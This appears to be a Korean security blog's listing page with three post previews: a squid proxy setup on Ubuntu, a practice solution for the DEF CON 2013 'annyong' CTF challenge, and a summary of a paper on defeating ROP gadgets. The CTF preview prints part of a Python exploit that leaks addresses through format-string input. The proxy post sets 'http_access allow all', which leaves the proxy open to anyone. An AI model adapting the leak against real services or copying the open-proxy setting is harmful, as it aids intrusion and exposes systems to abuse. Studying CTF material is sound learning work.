본문 바로가기

vmplayer로 ubuntu에 proxy server 설치 우분투에서 # apt-get install squid3# service squid3 start# ufw allow 3128# vi /etc/squid3/squid.conf-> "http_access allow all" 추가 윈도우에서 1. 3128 방화벽 해제2. 우분투로 3128번 포트포워딩(하지만, vmplayer에서는 포트포워딩이 불가능하다. 그러기위해선 vmnetcfg.exe가 필요한데, vmware workstation에서 추출해야한다. vmplayer5에서는 아래의 vmnetcfg.exe를 이용하면 될듯하다.) 압축을 해제한후, vmplayer폴더에 옮겨서 실행한다. 그리고, 해당하는 vmnet을 클릭한후, "NAT Settings"를 눌러서, Port Forwarding의 "Add"를 누르고.. 더보기
[defcon 2013] annyong exploit 대회때 푼건 아니고, 끝나고 연습용으로 품. 64bit, PIE, xinetd 환경. 실제 대회에서는 system offset은 브루트포싱으로 알아낼수있음. from socket import * from struct import * import sys cmd = "ls -al\x00" s = socket(AF_INET,SOCK_STREAM) s.connect(('localhost',5679)) # mov rdi rsi 0x1086 # write 0xfe3 s.send("%265$p\n") get=s.recv(1024) base_addr = int(get[2:],16) - 0x1127 print "base_addr: "+hex(base_addr) s.send("%4$p\n") get=s.recv(1024).. 더보기
Hindering ROP Using In-Place Code Randomization 요즘 보안쪽 논문을 보면, 생각했던것과 많이 달라 이쪽 대학원을 가야하나 말아야하나 망설여지지만, 그중 이 논문은 가장 괜찮았다. Smashing the Gadgets: Hindering Return-Oriented Programming Using In-Place Code Randomization ROP gadget을 없애는 방법을 제시하고있는데, 그중 가장 기억에 남는건 첫번째 방법인 Atomic Instruction Substitution이다. linux계열을 ROP로 공격할땐, 별로 소용이 없을것 같긴 하지만,windows계열에서는 꽤나 도움이 될듯하다. 이 논문에서 예를 든건 cmp al,bl 과 같은것들을 cmp bl,al로 바꿈으로써, ret(C3)를 없앤다는 내용이다.의미상으로는 전혀 다른게.. 더보기